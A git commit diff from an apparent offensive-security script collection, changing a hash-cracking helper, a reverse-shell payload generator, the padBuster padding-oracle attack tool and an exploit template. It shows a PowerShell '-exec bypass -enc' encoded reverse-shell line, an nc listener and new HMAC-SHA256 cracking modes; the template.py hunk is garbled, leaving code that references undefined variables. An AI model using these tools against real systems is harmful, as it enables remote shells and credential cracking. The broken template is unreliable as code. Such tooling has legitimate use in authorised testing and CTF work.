Update

2021-10-25 17:25:49 +02:00 · 2021-10-25 17:25:49 +02:00 · 718aaa6f6c
commit 718aaa6f6c
parent 2f555c5b9e
4 changed files with 23 additions and 18 deletions
--- a/crack_hash.py
+++ b/crack_hash.py
@ -33,6 +33,8 @@ class HashType(enum.Enum):
    RAW_SHA2_256 = 1400
    SHA256_PASS_SALT = 1410
    SHA256_SALT_PASS = 1420
    HMAC_SHA256_PASS = 1450
    HMAC_SHA256_SALT = 1460
    RAW_SHA2_384 = 10800
    RAW_SHA2_512 = 1700
    SHA512_PASS_SALT = 1710
@ -181,6 +183,8 @@ class Hash:
                if self.isSalted:
                    self.type.append(HashType.SHA256_PASS_SALT)
                    self.type.append(HashType.SHA256_SALT_PASS)
                    self.type.append(HashType.HMAC_SHA256_PASS)
                    self.type.append(HashType.HMAC_SHA256_SALT)
                else:
                    self.type.append(HashType.RAW_SHA2_256)
                    self.type.append(HashType.RAW_SHA3_256)
--- a/genRevShell.py
+++ b/genRevShell.py
@ -36,13 +36,16 @@ def generatePayload(type, local_address, port):
        payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode()
        return f"powershell.exe -exec bypass -enc {payload_encoded}"
 def spawn_listener(port):
    pty.spawn(["nc", "-lvvp", str(port)])
 def triggerShell(func, port):
    def _wait_and_exec():
        time.sleep(1.5)
        func()
    threading.Thread(target=_wait_and_exec).start()
-    pty.spawn(["nc", "-lvvp", str(port)])
+    spawn_listener(port)
 if __name__ == "__main__":
--- a/padBuster.pl
+++ b/padBuster.pl
@ -527,7 +527,7 @@ sub processBlock {
 				my $continue = "y";
-				if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
+				if (($error && $content !~ /$error/ && $location !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
 					# This is for autoretry logic (only works on the first byte)
 					if ($autoRetry == 1 &&  ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) {
 						$hasHit++;
--- a/template.py
+++ b/template.py
@ -5,36 +5,34 @@ import sys
 def generateTemplate(baseUrl):
    template = """#!/usr/bin/env python
 import os
 import sys
 import json
 import base64
 import requests
 import subprocess
 import urllib.parse
 from bs4 import BeautifulSoup
-from hackingscripts import util, fileserver
+from hackingscripts import util, fileserver, genRevShell
 from urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
 USERNAME = "admin"
 PASSWORD = "password"
-def login(username, password):
+def request(method, uri, **kwargs):
-    session = requests.Session()
+    if not uri.startswith("/") and uri != "":
-    post_data = { "username": username, "password": password }
+        uri = "/" + uri
    res = session.post(f"{BASE_URL}/login", data=post_data, allow_redirects=False)
    if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
        print("Login failed")
        exit()
    return session
-def exploit(session, payload):
+    client = requests
-    # Template method to exploit an endpoint
+    if "session" in kwargs:
-    pass
+        client = kwargs["session"]
        del kwargs["session"]
    return client.request(method, BASE_URL + uri, verify=False, allow_redirects=False, **kwargs)
 if __name__ == "__main__":
-    session = login(USERNAME, PASSWORD)
+    pass
    exploit(session, "id")
 """ % baseUrl
    return template